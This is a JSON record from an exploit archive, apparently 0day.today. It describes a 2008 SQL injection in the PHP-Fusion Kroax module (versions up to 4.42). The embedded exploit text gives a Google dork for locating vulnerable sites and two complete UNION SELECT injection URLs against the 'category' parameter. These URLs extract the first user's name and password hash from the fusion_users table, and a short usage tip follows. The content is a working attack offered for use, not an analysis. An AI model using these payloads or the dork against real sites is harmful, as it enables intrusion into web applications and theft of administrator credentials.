{"id": "1337DAY-ID-3300", "type": "zdt", "bulletinFamily": "exploit", "title": "PHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection Vulnerability", "description": "Exploit for unknown platform in category web applications", "published": "2008-06-26T00:00:00", "modified": "2008-06-26T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/3300", "reporter": "boom3rang", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-02-06T23:19:26", "viewCount": 23, "enchantments": {"score": {"value": 0.8, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.8}, "sourceHref": "https://0day.today/exploit/3300", "sourceData": "===================================================================\r\nPHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection Vulnerability\r\n===================================================================\r\n\r\n\r\n\r\n--- Remote SQL Injection ---\r\n\r\n[+]Google Dork: inurl:\"kroax.php?category\" \r\n\r\n--------------\r\n Exploit\r\n--------------\r\n\r\nexample:\r\n\r\nwww.site.com/infusions/the_kroax/kroax.php?category= [SQL]\r\n\r\n\r\n\r\n[+] username:\r\nwww.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang\r\n\r\n\r\n[+] password: \r\nwww.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang\\\r\n\r\n\r\nps. To find username use first \"SQL\" with table_name user_name, and for password use second \"SQL\" with table_name user_password.\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "_state": {"dependencies": 1645313241}}

{}